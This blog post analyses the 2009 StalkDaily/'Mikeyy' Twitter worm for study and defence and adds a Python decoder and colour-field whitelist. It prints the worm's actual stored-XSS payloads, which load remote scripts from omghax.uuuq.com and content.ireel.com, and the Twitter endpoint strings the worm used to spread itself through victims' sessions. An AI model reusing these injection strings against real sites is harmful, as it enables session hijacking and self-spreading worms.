Update: This post covers a newer version of the worm. I have located the original code, and it is reviewed in a newer post.
The following is a quickly developed, haphazard analysis of the StalkDaily worm that infected the accounts of Twitter users on 12 Apr 2009. Apologies for the roughness; it was done to satisfy my own curiosity. If you spot something clearly wrong, let me know. If anyone would like any further information, please contact me.
Observation
By observation, this worm does the following:
- Causes you to tweet something like:
  - Wow…Mikeyy.
  - Mikeyy. Woooo!
  - Dude, Mikeyy is the shit! :)
  - damn mikeyy. haha.
  - Man, Twitter can’t fix shit. Mikeyy owns. :)
  - Twitter should really fix this… Mikeyy
- Causes you to follow profile 28546293, or onedegrees
- Updates your profile name to “Mikey Owns”
- Inserts a link to the worm code into your profile's color field
Unpacking
By comparing the accounts of infected and uninfected users we see the following code:
a { color: #</style>mikeyy:) "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6f%6d%67%68%61%78%2e%75%75%75%71%2e%63%6f%6d%2f%77%6f%6f%2e%70%68%70%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <style> <a ; }
This appears in the place where we would expect to see a CSS color property, as follows:
a { color: #0000ff; }
This appears to be an injection into the Twitter database, replacing the colour code of the page with JavaScript. That JavaScript instructs the browser to load the script located at http://omghax.uuuq.com/woo.php. By watching the proxy logs of a machine browsing infected pages, we see the following pages being accessed:
http://omghax.uuuq.com/woo
http://omghax.uuuq.com/bam
This is explained by examining one of these scripts. Within the script are found the following strings:
- Msxml2.XMLHTTP
- Microsoft.XMLHTTP
- connect
- oUpperCase
- GET
- ?
- open
- Method
- POST
- HTTP/1.1
- setRequestHeader
- Content-Type
- application/x-www-form-urlencoded
- onreadystatechange
- readyState
- send
- split
- join
- '
- %27
- (
- %28
- )
- %29
- *
- %2A
- ~
- %7E
- !
- %21
- %20
- +
- %
- replace
- innerHTML
- documentElement
- exec
- Dude, Mikeyy is the shit!
- Man, Twitter can’t fix shit. Mikeyy owns.
- Mikeyy. Woooo!
- Dude! Mikeyy! Seriously? Haha.
- Wow…Mikeyy.
- damn mikeyy. haha.
- random
- length
- floor
- </style>mikeyy:) "></a><script>document.write(<script src="http://omghax.uuuq.com/woo.php"></script>.source));</script> <style> <a
- </style>mikeyy:) "></a><script>document.write(<script src="http://content.ireel.com/jsxss.js"></script>.source));</script> <style><a
- </style>mikeyy:) "></a><script>document.write(<script src="http://content.ireel.com/xssjs.js"></script>.source));</script> <style><a
- </style>mikeyy:) "></a><script>document.write(<script src="http://omghax.uuuq.com/bam"></script>.source));</script> <style><a
- </style>mikeyy:) "></a><script>document.write(<script src="http://omghax.uuuq.com/woo"></script>.source));</script> <style><a
- /account/profile_settings
- POST
- authenticity_token=
- &user[profile_link_color]=
- &commit=save+changes
- /account/settings
- &user[name]=Mikeyy+Owns&user[url]=
- &tab=home&update=update
- /status/update
- &status=
- &return_rendered_status=true&twttr=true
- /friendships/create/28546293
- &twttr=true
- wait()
Analysis
Towards the bottom of this list you start to see some important elements:
- /account/profile_settings &user[profile_link_color]= &commit=save+changes
- /account/settings &user[name]=Mikeyy+Owns&user[url]=
- /status/update
- /friendships/create/28546293
While the code is obfuscated, and beyond my knowledge to easily decode, these strings provide some important clues. I would assume that the worm is calling URLs at Twitter using these strings. Conceivably these would:
- Update the profile colour, inserting the worm code
- Update the profile name
- Create a friendship with onedegrees
Because the code is run inside the browser, in the context of normal page views by the logged-in Twitter user, the code “acts on your behalf” to perform these actions. Neither the script nor the script author knows your username or password; it simply “asks” the browser to perform these actions. Because you are already logged on in the browser, the action is performed as if you did it yourself.
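To make the unpacking above concrete, here is an added Python example (not code from the original post or from Twitter): it decodes the unescape() payload from the injected colour field to reveal the remote script it loads, and applies a strict six-hex-digit whitelist of the kind a server-side fix would need. The whitelist and the detection rule are my assumptions about a reasonable fix, not Twitter's actual one; the sample strings are copied from the values shown on this page.

```python
import re
from typing import List
from urllib.parse import unquote

# Sample values taken from the infected and clean profile stylesheets shown above.
INJECTED = ('a { color: #</style>mikeyy:) "></a><script>document.write(unescape('
            '/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6f%6d%67'
            '%68%61%78%2e%75%75%75%71%2e%63%6f%6d%2f%77%6f%6f%2e%70%68%70%22%3e%3c'
            '%2f%73%63%72%69%70%74%3e/.source));</script> <style> <a ; }')
CLEAN = 'a { color: #0000ff; }'

# Assumed server-side whitelist: a profile link colour is exactly six hex digits.
COLOR_RE = re.compile(r'^[0-9A-Fa-f]{6}$')


def is_valid_link_color(value: str) -> bool:
    """Accept only values that could be a real colour; anything else is rejected."""
    return bool(COLOR_RE.match(value))


def extract_color_field(css: str) -> str:
    """Return whatever was stored between 'color: #' and the closing '; }'."""
    m = re.search(r'color: #(.*); }$', css, re.S)
    return m.group(1) if m else ''


def decode_unescape_payloads(text: str) -> List[str]:
    """Decode every unescape(/.../.source) fragment; the worm hid its loader this way."""
    return [unquote(p) for p in re.findall(r'unescape\(/([^/]+)/\.source\)', text)]


def extract_script_urls(text: str) -> List[str]:
    """List src= URLs of <script> tags, including ones hidden behind %xx encoding."""
    decoded = text + ''.join(decode_unescape_payloads(text))
    return re.findall(r'<script\s+src="([^"]+)"', decoded, re.I)


def is_infected_profile(css: str) -> bool:
    """Detection rule: colour field fails the whitelist or pulls in an external script."""
    field = extract_color_field(css)
    return not is_valid_link_color(field) or bool(extract_script_urls(css))


if __name__ == '__main__':
    print('loads:', extract_script_urls(INJECTED))
    print('infected:', is_infected_profile(INJECTED), is_infected_profile(CLEAN))
```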
Conclusion
I would estimate that the root cause of this problem is a JavaScript injection vulnerability in Twitter's color field, which now seems to be fixed. This allowed the worm to place JavaScript code inside this field, rather than the expected colour code which would normally be sent by the browser.
While not the cause, another vulnerability that allowed this to happen is the web browser's built-in JavaScript engine, which runs any JavaScript code it is instructed to. This to me is not desirable. In effect, every time you visit a website, you are inviting some unknown person to run whatever JavaScript code they like inside your browser. This has historically been the cause of many major security and virus problems, and will be into the future.
JavaScript is a useful tool in creating interactive websites, but must be considered carefully. I recommend disabling JavaScript by default and only enabling it for sites you trust. The NoScript extension makes this easy.
Since the malicious code in the StalkDaily worm was hosted on an external site, allowing Twitter's own JavaScript to run would not have allowed this worm to execute unless you had also permitted code from uuuq.com to run.